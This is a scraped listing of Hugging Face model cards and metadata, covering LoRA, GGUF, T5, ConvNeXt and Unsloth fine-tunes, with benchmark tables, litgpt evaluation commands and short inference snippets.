| - leaderboard_bbh_causal_judgement | 1|none | 3|acc_norm |↑ |0.5027|± |0.0367|
| - leaderboard_bbh_date_understanding | 1|none | 3|acc_norm |↑ |0.1720|± |0.0239|
| - leaderboard_bbh_disambiguation_qa | 1|none | 3|acc_norm |↑ |0.2960|± |0.0289|
| - leaderboard_bbh_formal_fallacies | 1|none | 3|acc_norm |↑ |0.4880|± |0.0317|
| - leaderboard_bbh_geometric_shapes | 1|none | 3|acc_norm |↑ |0.0000|± | 0|
| - leaderboard_bbh_hyperbaton | 1|none | 3|acc_norm |↑ |0.5160|± |0.0317|
| - leaderboard_bbh_logical_deduction_five_objects | 1|none | 3|acc_norm |↑ |0.2000|± |0.0253|
| - leaderboard_bbh_logical_deduction_seven_objects | 1|none | 3|acc_norm |↑ |0.1480|± |0.0225|
| - leaderboard_bbh_logical_deduction_three_objects | 1|none | 3|acc_norm |↑ |0.3160|± |0.0295|
| - leaderboard_bbh_movie_recommendation | 1|none | 3|acc_norm |↑ |0.2360|± |0.0269|
| - leaderboard_bbh_navigate | 1|none | 3|acc_norm |↑ |0.4680|± |0.0316|
| - leaderboard_bbh_object_counting | 1|none | 3|acc_norm |↑ |0.0480|± |0.0135|
| - leaderboard_bbh_penguins_in_a_table | 1|none | 3|acc_norm |↑ |0.1918|± |0.0327|
| - leaderboard_bbh_reasoning_about_colored_objects | 1|none | 3|acc_norm |↑ |0.1440|± |0.0222|
| - leaderboard_bbh_ruin_names | 1|none | 3|acc_norm |↑ |0.2360|± |0.0269|
| - leaderboard_bbh_salient_translation_error_detection | 1|none | 3|acc_norm |↑ |0.1360|± |0.0217|
| - leaderboard_bbh_snarks | 1|none | 3|acc_norm |↑ |0.5225|± |0.0375|
| - leaderboard_bbh_sports_understanding | 1|none | 3|acc_norm |↑ |0.4560|± |0.0316|
| - leaderboard_bbh_temporal_sequences | 1|none | 3|acc_norm |↑ |0.2960|± |0.0289|
| - leaderboard_bbh_tracking_shuffled_objects_five_objects | 1|none | 3|acc_norm |↑ |0.2120|± |0.0259|
| - leaderboard_bbh_tracking_shuffled_objects_seven_objects| 1|none | 3|acc_norm |↑ |0.1840|± |0.0246|
| - leaderboard_bbh_tracking_shuffled_objects_three_objects| 1|none | 3|acc_norm |↑ |0.3160|± |0.0295|
| - leaderboard_bbh_web_of_lies | 1|none | 3|acc_norm |↑ |0.5200|± |0.0317|
| - leaderboard_gpqa | N/A| | | | | | | |
| - leaderboard_gpqa_diamond | 1|none | 0|acc_norm |↑ |0.2172|± |0.0294|
| - leaderboard_gpqa_extended | 1|none | 0|acc_norm |↑ |0.2454|± |0.0184|
| - leaderboard_gpqa_main | 1|none | 0|acc_norm |↑ |0.2478|± |0.0204|
| - leaderboard_ifeval | 3|none | 0|inst_level_loose_acc |↑ |0.1727|± | N/A|
| | |none | 0|inst_level_strict_acc |↑ |0.1559|± | N/A|
| | |none | 0|prompt_level_loose_acc |↑ |0.0832|± |0.0119|
| | |none | 0|prompt_level_strict_acc|↑ |0.0795|± |0.0116|
| - leaderboard_math_hard | N/A| | | | | | | |
| - leaderboard_math_algebra_hard | 1|none | 4|exact_match |↑ |0.0000|± | 0|
| - leaderboard_math_counting_and_prob_hard | 1|none | 4|exact_match |↑ |0.0000|± | 0|
| - leaderboard_math_geometry_hard | 1|none | 4|exact_match |↑ |0.0000|± | 0|
| - leaderboard_math_intermediate_algebra_hard | 1|none | 4|exact_match |↑ |0.0000|± | 0|
| - leaderboard_math_num_theory_hard | 1|none | 4|exact_match |↑ |0.0000|± | 0|
| - leaderboard_math_prealgebra_hard | 1|none | 4|exact_match |↑ |0.0000|± | 0|
| - leaderboard_math_precalculus_hard | 1|none | 4|exact_match |↑ |0.0000|± | 0|
| - leaderboard_mmlu_pro | 0.1|none | 5|acc |↑ |0.1135|± |0.0029|
| - leaderboard_musr | N/A| | | | | | | |
| - leaderboard_musr_murder_mysteries | 1|none | 0|acc_norm |↑ |0.5240|± |0.0316|
| - leaderboard_musr_object_placements | 1|none | 0|acc_norm |↑ |0.2734|± |0.0279|
| - leaderboard_musr_team_allocation | 1|none | 0|acc_norm |↑ |0.3000|± |0.0290|
```bash
litgpt evaluate --tasks 'bbh_zeroshot,bbh_fewshot,bbh_cot_fewshot,bbh_cot_zeroshot' --out_dir 'evaluate-bigbenchhard/' --batch_size 4 --dtype 'bfloat16' out/pretrain/final/
```
```bash
litgpt evaluate --tasks 'mmlu,mmlu_pro' --out_dir 'evaluate-mmlu/' --batch_size 4 --dtype 'bfloat16' out/pretrain/final/
```
```bash
litgpt evaluate --tasks 'arc_challenge,boolq,gpqa,hellaswag,openbookqa,piqa,truthfulqa_mc2,winogrande' --out_dir 'evaluate-reasoning/' --batch_size 4 --dtype 'bfloat16' out/pretrain/final/
```
```bash
litgpt evaluate --tasks 'mmlu_multilingual,mgsm' --out_dir 'evaluate-multilinguals/' --batch_size 4 --dtype 'bfloat16' out/pretrain/final/
```
```bash
litgpt evaluate --tasks 'gsm8k,mathqa' --out_dir 'evaluate-math/' --batch_size 4 --dtype 'bfloat16' out/pretrain/final/
```
|Tasks |Version| Filter |n-shot| Metric | |Value | |Stderr|
|------|------:|----------------|-----:|-----------|---|-----:|---|-----:|
|gsm8k | 3|flexible-extract| 5|exact_match|↑ |0.0099|± |0.0027|
| | |strict-match | 5|exact_match|↑ |0.0000|± |0.0000|
|mathqa| 1|none | 0|acc |↑ |0.2121|± |0.0075|
| | |none | 0|acc_norm |↑ |0.2114|± |0.0075|
```bash
litgpt evaluate --tasks 'wikitext,qasper' --out_dir 'evaluate-long/' --batch_size 4 --dtype 'bfloat16' out/pretrain/final/
```
|
Kvisten/abisko-lite-3-v1 | Kvisten | 2024-10-10T11:17:16Z | 6 | 1 | diffusers | [
"diffusers",
"text-to-image",
"flux",
"lora",
"template:sd-lora",
"ai-toolkit",
"base_model:black-forest-labs/FLUX.1-schnell",
"base_model:adapter:black-forest-labs/FLUX.1-schnell",
"license:apache-2.0",
"region:us"
] | text-to-image | 2024-10-10T11:17:08Z | ---
tags:
- text-to-image
- flux
- lora
- diffusers
- template:sd-lora
- ai-toolkit
widget:
- text: A light blue abisko-lite-3 tent set up on a rocky mountain ridge, surrounded
by rugged terrain and distant snow-capped peaks. The tent's guy lines are
secured to nearby rocks, and the fabric flutters slightly in the breeze. A
few scattered wildflowers can be seen growing between the rocks.
output:
url: samples/1728558986100__000003500_0.jpg
- text: A green Abisko lite 3 tent pitched in a dense forest clearing. Tall pine
trees surround the tent, and dappled sunlight filters through the branches,
casting soft shadows on the tent's surface. Fallen leaves and moss cover the
ground, adding a touch of green to the scene.
output:
url: samples/1728558994824__000003500_1.jpg
- text: The light blue abisko-lite-3 tent stands on a sandy beach near a calm lake,
with gentle waves lapping at the shore. The tent's fabric contrasts against
the golden sand, and a few scattered driftwood pieces lie nearby. The sun
is setting, casting a warm glow over the water.
output:
url: samples/1728559003546__000003500_2.jpg
- text: A olive-green abisko-lite-3 tent set up in an open field covered in fresh
snow. The tent is surrounded by tall pine trees dusted with snow, and the
sky is overcast, with light snowflakes gently falling. The tent's guy lines
are staked firmly into the snow, and a few animal tracks are visible nearby.
output:
url: samples/1728559012268__000003500_3.jpg
- text: A abisko-lite-3 tent, olive-green color, pitched on a grassy hillside, with
its streamlined, tunnel-shaped design tapering down from the higher front
to the lower rear for better wind resistance. The tent's extended front vestibule
provides sheltered storage space, with the zippered door partially open to
reveal the interior. Multiple guy lines are secured tightly to the ground,
keeping the fabric taut, while arched poles maintain the tent's aerodynamic
shape. The rainfly extends close to the ground for full coverage, and ventilation
flaps at both the front and rear ensure optimal airflow. The surrounding grass
sways gently in the breeze.
output:
url: samples/1728559020993__000003500_4.jpg
base_model: black-forest-labs/FLUX.1-schnell
instance_prompt: Abisko lite 3 tent
license: apache-2.0
---
# abisko_lite_3
Model trained with [AI Toolkit by Ostris](https://github.com/ostris/ai-toolkit)
<Gallery />
## Trigger words
You should use `Abisko lite 3 tent` to trigger the image generation.
## Download model and use it with ComfyUI, AUTOMATIC1111, SD.Next, Invoke AI, etc.
Weights for this model are available in Safetensors format.
[Download](/Kvisten/abisko-lite-3-v1/tree/main) them in the Files & versions tab.
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-schnell', torch_dtype=torch.bfloat16).to('cuda')
pipeline.load_lora_weights('Kvisten/abisko-lite-3-v1', weight_name='abisko_lite_3.safetensors')
image = pipeline("A light blue abisko-lite-3 tent set up on a rocky mountain ridge, surrounded by rugged terrain and distant snow-capped peaks. The tent's guy lines are secured to nearby rocks, and the fabric flutters slightly in the breeze. A few scattered wildflowers can be seen growing between the rocks.").images[0]
image.save("my_image.png")
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
|
kholiavko/test-gemma | kholiavko | 2024-10-10T11:15:10Z | 5 | 0 | transformers | [
"transformers",
"gguf",
"gemma2",
"text-generation-inference",
"unsloth",
"en",
"base_model:unsloth/gemma-2-9b-it-bnb-4bit",
"base_model:quantized:unsloth/gemma-2-9b-it-bnb-4bit",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T11:09:25Z | ---
base_model: unsloth/gemma-2-9b-it-bnb-4bit
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- gemma2
- gguf
---
# Uploaded model
- **Developed by:** kholiavko
- **License:** apache-2.0
- **Finetuned from model :** unsloth/gemma-2-9b-it-bnb-4bit
This gemma2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
Ayon128/t5_nmt_bn_en_Eng_Banglish | Ayon128 | 2024-10-10T11:11:44Z | 112 | 0 | transformers | [
"transformers",
"safetensors",
"t5",
"text2text-generation",
"translation",
"generated_from_trainer",
"base_model:csebuetnlp/banglat5_nmt_bn_en",
"base_model:finetune:csebuetnlp/banglat5_nmt_bn_en",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | translation | 2024-10-10T09:43:26Z | ---
library_name: transformers
base_model: csebuetnlp/banglat5_nmt_bn_en
tags:
- translation
- generated_from_trainer
metrics:
- bleu
model-index:
- name: t5_nmt_bn_en_Eng_Banglish
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# t5_nmt_bn_en_Eng_Banglish
This model is a fine-tuned version of [csebuetnlp/banglat5_nmt_bn_en](https://huggingface.co/csebuetnlp/banglat5_nmt_bn_en) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: nan
- Model Preparation Time: 0.0109
- Bleu: 2.7591
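A minimal inference sketch with 🤗 Transformers; the input sentence and generation settings are placeholders, and any text normalization used by the base model is not applied here:

```py
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM

repo = "Ayon128/t5_nmt_bn_en_Eng_Banglish"

tokenizer = AutoTokenizer.from_pretrained(repo)
model = AutoModelForSeq2SeqLM.from_pretrained(repo)

# Placeholder input sentence.
inputs = tokenizer("I will go to the market tomorrow.", return_tensors="pt")
outputs = model.generate(**inputs, max_new_tokens=64)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```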
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0005
- train_batch_size: 32
- eval_batch_size: 64
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 10
- mixed_precision_training: Native AMP
### Training results
### Framework versions
- Transformers 4.45.1
- Pytorch 2.4.0
- Datasets 3.0.1
- Tokenizers 0.20.0
|
AndyRoberts/dynamic_tinybert-squad | AndyRoberts | 2024-10-10T11:02:54Z | 58 | 0 | transformers | [
"transformers",
"safetensors",
"bert",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T10:22:59Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
dioojj99/task-13-google-gemma-2b | dioojj99 | 2024-10-10T10:59:08Z | 6 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:google/gemma-2b",
"base_model:adapter:google/gemma-2b",
"region:us"
] | null | 2024-10-10T09:40:55Z | ---
base_model: google/gemma-2b
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.13.1 |
QuantFactory/llama-7b-GGUF | QuantFactory | 2024-10-10T10:58:06Z | 28 | 1 | null | [
"gguf",
"license:other",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T07:12:50Z |
---
license: other
---
[](https://hf.co/QuantFactory)
# QuantFactory/llama-7b-GGUF
This is a quantized version of [huggyllama/llama-7b](https://huggingface.co/huggyllama/llama-7b) created using llama.cpp
# Original Model Card
This contains the weights for the LLaMA-7b model. This model is under a non-commercial license (see the LICENSE file).
You should only use this repository if you have been granted access to the model by filling out [this form](https://docs.google.com/forms/d/e/1FAIpQLSfqNECQnMkycAp2jP4Z9TFX0cGR4uf7b_fBxjY_OjhJILlKGA/viewform?usp=send_form) but have either lost your copy of the weights or run into trouble converting them to the Transformers format.
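A minimal usage sketch with [llama-cpp-python](https://github.com/abetlen/llama-cpp-python) might look like the following; the quantization filename is an assumption, so check the Files tab for the variants actually provided in this repo.

```python
# A minimal sketch, assuming llama-cpp-python is installed and that a Q4_K_M
# quantization exists in this repo (the filename pattern below is hypothetical).
from llama_cpp import Llama

llm = Llama.from_pretrained(
    repo_id="QuantFactory/llama-7b-GGUF",
    filename="*Q4_K_M.gguf",  # match whichever quant you actually downloaded
    n_ctx=2048,
)
out = llm("The capital of Sweden is", max_tokens=32)
print(out["choices"][0]["text"])
```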
|
vtsrpkn/llama-lexi | vtsrpkn | 2024-10-10T10:48:12Z | 6 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"text-generation-inference",
"unsloth",
"trl",
"sft",
"conversational",
"en",
"base_model:Orenguteng/Llama-3.1-8B-Lexi-Uncensored-V2",
"base_model:finetune:Orenguteng/Llama-3.1-8B-Lexi-Uncensored-V2",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T10:43:55Z | ---
base_model: Orenguteng/Llama-3.1-8B-Lexi-Uncensored-V2
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
- sft
---
# Uploaded model
- **Developed by:** vtsrpkn
- **License:** apache-2.0
- **Finetuned from model :** Orenguteng/Llama-3.1-8B-Lexi-Uncensored-V2
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
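As a rough starting point, a hedged inference sketch with 🤗 Transformers (assuming the fine-tune keeps the base Llama 3.1 chat template) could look like this:

```python
# A minimal inference sketch; adjust the chat template or prompt format if your
# training setup used a different one.
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "vtsrpkn/llama-lexi"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype=torch.bfloat16, device_map="auto")

messages = [{"role": "user", "content": "Summarize what you were fine-tuned for in one sentence."}]
inputs = tokenizer.apply_chat_template(messages, add_generation_prompt=True, return_tensors="pt").to(model.device)
output = model.generate(inputs, max_new_tokens=128)
print(tokenizer.decode(output[0][inputs.shape[-1]:], skip_special_tokens=True))
```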
|
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-103606 | Trelis | 2024-10-10T10:37:58Z | 128 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T10:37:22Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Rafay17/Llama3.2_1b_customModle | Rafay17 | 2024-10-10T10:34:29Z | 14 | 0 | transformers | [
"transformers",
"gguf",
"llama",
"text-generation-inference",
"unsloth",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2024-10-10T10:33:48Z | ---
base_model: unsloth/llama-3.2-1b-bnb-4bit
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- gguf
---
# Uploaded model
- **Developed by:** Rafay17
- **License:** apache-2.0
- **Finetuned from model :** unsloth/llama-3.2-1b-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
wcosmas/convnext-tiny-224-finetuned-papsmear | wcosmas | 2024-10-10T10:33:15Z | 199 | 0 | transformers | [
"transformers",
"safetensors",
"convnext",
"image-classification",
"generated_from_trainer",
"dataset:imagefolder",
"base_model:facebook/convnext-tiny-224",
"base_model:finetune:facebook/convnext-tiny-224",
"license:apache-2.0",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | image-classification | 2024-10-10T06:23:13Z | ---
library_name: transformers
license: apache-2.0
base_model: facebook/convnext-tiny-224
tags:
- generated_from_trainer
datasets:
- imagefolder
metrics:
- accuracy
model-index:
- name: convnext-tiny-224-finetuned-papsmear
results:
- task:
name: Image Classification
type: image-classification
dataset:
name: imagefolder
type: imagefolder
config: default
split: train
args: default
metrics:
- name: Accuracy
type: accuracy
value: 0.8897058823529411
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# convnext-tiny-224-finetuned-papsmear
This model is a fine-tuned version of [facebook/convnext-tiny-224](https://huggingface.co/facebook/convnext-tiny-224) on the imagefolder dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2836
- Accuracy: 0.8897
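For quick inference, a minimal sketch with the image-classification pipeline is shown below; the image path is a placeholder.

```python
# A minimal inference sketch; the image file is a placeholder and the predicted
# labels come from the (unnamed) imagefolder dataset used for fine-tuning.
from transformers import pipeline

classifier = pipeline("image-classification", model="wcosmas/convnext-tiny-224-finetuned-papsmear")
for pred in classifier("pap_smear_example.jpg"):  # hypothetical local image
    print(f"{pred['label']}: {pred['score']:.3f}")
```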
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 128
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 50
### Training results
